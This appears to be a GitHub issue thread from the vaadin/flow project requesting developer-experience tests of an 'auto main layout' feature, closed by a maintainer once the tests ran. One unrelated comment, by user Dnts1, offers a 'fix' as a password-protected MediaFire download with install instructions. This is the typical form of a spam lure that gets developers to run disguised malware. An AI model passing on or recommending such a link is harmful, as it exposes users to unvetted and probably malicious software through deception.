### ISSUE TITLE
Run Developer Experience tests for auto main layout feature

### ISSUE THREAD

**Issue by mshabarov** [vaadin/flow#19843]
### Describe your motivation

Run DX test with [auto main layout feature in Flow](https://github.com/vaadin/docs/pull/3618).
Requirements: 1-2 Java experts with Flow experience.
Some ideas what to test:
- How to customise the auto layouting
- Simple case when all the routes are in a single layout
- How to opt out for some routes
- How to use multiple layouts

### Additional context

To be done before 24.5 beta, i.e. Sep 9, 2024

**Comment by Dnts1** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by caalador** [comment]
DX tests run. Closing ticket.
